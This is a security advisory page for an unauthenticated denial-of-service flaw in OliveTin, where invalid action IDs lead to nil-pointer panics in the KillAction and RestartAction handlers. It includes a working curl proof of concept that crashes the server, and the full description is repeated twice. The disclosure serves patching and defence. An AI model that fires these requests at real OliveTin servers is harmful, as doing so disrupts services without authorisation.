Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
5.3
OliveTin allows unauthenticated server crashes by exploiting invalid API calls
GHSA-fwhj-785h-43hh
Summary
An attacker can crash OliveTin servers by creating a log entry with an invalid action ID and then calling KillAction or RestartAction. This causes repeated server crashes, potentially leading to a denial of service. To fix this, update to a patched version of OliveTin or apply a custom fix to validate action IDs before creating log entries.
What to do
- Update github.com olivetin to version 0.0.0-20260304225158-bb14c5da3e64.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| github.com | olivetin | <= 0.0.0-20260304225158-bb14c5da3e64 | 0.0.0-20260304225158-bb14c5da3e64 |
Original title
OliveTin has crash on NPE by calling APIs with invalid bindings or log references
Original description
### Summary
An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via `StartActionByGet` (invalid action ID), then calling `KillAction` or `RestartAction` on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (`Empty reply from server`), enabling denial of service through panic/log/CPU amplification.
### Details
The issue is caused by this flow:
1. `StartActionByGet` accepts arbitrary `actionId` and still calls executor:
- `service/internal/api/api.go:239`
2. Executor stores a log entry before binding validation:
- `service/internal/executor/executor.go:519`
3. If binding is nil, execution stops, but the log entry remains:
- `service/internal/executor/executor.go:781`
4. `KillAction` dereferences `execReqLogEntry.Binding.Action` without checking `Binding`:
- `service/internal/api/api.go:79`
5. `RestartAction` has the same unsafe dereference:
- `service/internal/api/api.go:1285`
Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.
### PoC
Environment:
- OliveTin default single frontend on `http://localhost:1337`
- Reproduced on `main` (commit `235493e`) and tag `3000.11.0`
1) Create orphan tracking ID with invalid action:
```bash
T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
-H 'Content-Type: application/json' \
--data '{"actionId":"does-not-exist"}' \
| sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"
2. Trigger panic in RestartAction:
curl -v -X POST http://localhost:1337/api/RestartAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
3. Trigger panic in KillAction:
curl -v -X POST http://localhost:1337/api/KillAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
Observed client output:
- curl: (52) Empty reply from server
Observed server log:
- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
- service/internal/api/api.go:79 (KillAction)
- service/internal/api/api.go:1285 (RestartAction)
```
### Impact
This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.
An unauthenticated attacker can trigger server-side panics by first creating an execution log entry with a nil binding via `StartActionByGet` (invalid action ID), then calling `KillAction` or `RestartAction` on that tracking ID. This causes a nil-pointer dereference in API handlers and results in repeated per-request panics (`Empty reply from server`), enabling denial of service through panic/log/CPU amplification.
### Details
The issue is caused by this flow:
1. `StartActionByGet` accepts arbitrary `actionId` and still calls executor:
- `service/internal/api/api.go:239`
2. Executor stores a log entry before binding validation:
- `service/internal/executor/executor.go:519`
3. If binding is nil, execution stops, but the log entry remains:
- `service/internal/executor/executor.go:781`
4. `KillAction` dereferences `execReqLogEntry.Binding.Action` without checking `Binding`:
- `service/internal/api/api.go:79`
5. `RestartAction` has the same unsafe dereference:
- `service/internal/api/api.go:1285`
Because the dereference happens before authorization checks in these handlers, this is reachable unauthenticated.
### PoC
Environment:
- OliveTin default single frontend on `http://localhost:1337`
- Reproduced on `main` (commit `235493e`) and tag `3000.11.0`
1) Create orphan tracking ID with invalid action:
```bash
T=$(curl -s -X POST http://localhost:1337/api/StartActionByGet \
-H 'Content-Type: application/json' \
--data '{"actionId":"does-not-exist"}' \
| sed -n 's/.*"executionTrackingId":"\([^"]*\)".*/\1/p')
echo "$T"
2. Trigger panic in RestartAction:
curl -v -X POST http://localhost:1337/api/RestartAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
3. Trigger panic in KillAction:
curl -v -X POST http://localhost:1337/api/KillAction \
-H 'Content-Type: application/json' \
--data "{\"executionTrackingId\":\"$T\"}"
Observed client output:
- curl: (52) Empty reply from server
Observed server log:
- panic serving ... runtime error: invalid memory address or nil pointer dereference
- stack points to:
- service/internal/api/api.go:79 (KillAction)
- service/internal/api/api.go:1285 (RestartAction)
```
### Impact
This is an unauthenticated denial-of-service vulnerability (panic-based request disruption and log/CPU amplification). An attacker can repeatedly trigger panics remotely without credentials, degrading service reliability and observability.
ghsa CVSS3.1
5.3
Vulnerability type
CWE-20
Improper Input Validation
CWE-476
NULL Pointer Dereference
Published: 5 Mar 2026 · Updated: 7 Mar 2026 · First seen: 6 Mar 2026